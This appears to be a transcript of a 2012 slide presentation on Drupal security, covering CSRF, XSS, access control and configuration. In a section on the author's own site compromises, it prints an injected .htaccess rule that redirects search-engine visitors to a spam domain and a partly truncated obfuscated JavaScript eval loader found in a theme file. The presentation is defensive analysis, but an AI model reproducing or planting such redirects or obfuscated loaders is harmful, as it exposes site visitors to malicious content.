a brief analysis of drupal security
DESCRIPTION
A Brief Analysis of Drupal Security. Andrew Welsh 21 Feb 2012. Presentation Overview. Introduction What is Drupal Secure Drupal Code Drupal Configuration Personal Drupal Issues Conclusion. Introduction. whoami; [email protected]. What is Drupal. - PowerPoint PPT PresentationTRANSCRIPT
A Brief Analysis of Drupal Security
Andrew Welsh
21 Feb 2012
Presentation Overview
Introduction What is Drupal Secure Drupal Code Drupal Configuration Personal Drupal Issues Conclusion
What is Drupal
Drupal is a mature, open-source, PHP-based CMS and web application framework. The Drupal project is composed of two principal bodies of work:
(1) the Drupal core code base
(2) thousands of contributed modules and themes
What is Drupal
Sites that use Drupal: Nasa The Economist Ubuntu 20th Century Fox Searchlight Warner Bros Recordings United Nations – End Poverty 2015 Yahoo! Research Amnesty International OpenOffice Extensions Popular Science AOL Corporate Nike Beijing Olympics White House
Secure Drupal Code
Form API:
<img src="http://test.com/index.php?delete=12" />
1) It requires the form to be loaded (given a token) before form submission can happen, making CSRF more difficult.
1) It validates and sanitizes data from form submissions, making XSS more difficult.
Secure Drupal Code
ACL- URL access
Http://www.site.com/user/1/delete
1) Menu system handles permission checking user_access('administer nodes', $account) node_access('edit', $node, $account)
- drupal_goto() instances are used to validate their compliance with internal redirects
Secure Drupal Code
Authentication
1) User sessions are destroyed and recreated upon logging out and logging in.2) Session IDs changed when permissions change.3) Auth cookies are not modifiable by site users.4) Passwords are salted and hashed.
Secure Drupal Code
Database API - to enforce security checks and good coding standards.
Bind Parameters Named Placeholders
Drupal Configuration
1) Configure logging appropriately, never display log errors to users.2) Never display db connection strings.3) Check watchdog report.4) Look at all administrator permissions.5) Watch input formats for comments, etc.
Drupal Configuration (v5)
Drupal Configuration
Update Regularly!
Personal Drupal Issues
Public node access
Personal Drupal Issues
#336988#<IfModule mod_rewrite.c>RewriteEngine OnRewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|
allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio......sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://forumbeagle.cba.pl/store/traf.php [R=301,L]</IfModule>#/336988#
Personal Drupal Issues
JS injection in page.tpl.php
<script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=179;} if(dbshre){ asd=0;
try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;
asgq=newArray(31,94,110,104,94,107.........101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,93,113,99,93,100,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,93,113,99,93,100,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-500!=0;i++){
if((020==0x10)&&window.document )s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4)); }
z=s;e(s)
} </script>
Conclusion
Personal Thoughts: Drupal is a very good, well-used, peer-reviewed
CMS and the security aspect is well addressed. Always stay current with upgrades. Be careful with custom code (themes or
modules), always peer review.
Thank You
Contact Info: [email protected]
Sources: http://drupal.org/writing-secure-code
http://drupal.org/node/766404
http://drupal.org/security/secure-configuration
http://www.mediacurrent.com/blog/drupal-security-review
http://www.slideshare.net/fourkitchens/is-drupal-secure
http://drupalsecurityreport.org/sites/drupalsecurityreport.org/files/drupal-security-white-paper-1-1.pdf
http://drupal.org/documentation/is-drupal-secure
http://www.cameronandwilding.com/blog/pablo/10-most-critical-drupal-security-risks